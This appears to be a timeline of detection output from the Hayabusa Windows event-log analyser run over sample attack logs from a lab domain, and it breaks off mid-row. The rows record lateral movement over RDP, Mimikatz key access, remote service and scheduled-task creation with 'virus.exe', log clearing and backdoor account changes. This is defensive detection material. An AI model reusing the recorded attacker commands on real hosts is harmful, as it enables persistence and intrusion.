0x64f64e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 
747F3D96-9371-5F07-0000-00102D024400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 
+2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: 
C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 
747F3D96-40F5-5F08-0000-001095812D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | 
LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx +2020-07-12 06:38:17.351 +09:00,fs02.offsec.lan,4698,info,,Task Created,"Name: \smbservice | Content: 2020-07-11T21:38:17 OFFSEC\lambda-user 2020-07-11T15:20:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\WINDOWS\Temp\MpCmdRun.bat S-1-5-18 LeastPrivilege | User: admmig | LID: 0x3246775",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,info,,Task Deleted,Name: \smbservice | User: admmig | LID: 0x3246ace,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. 
arg.).evtx +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx +2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,Persis,Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx 
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 
0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 
+09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 
0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 
+09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 
0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 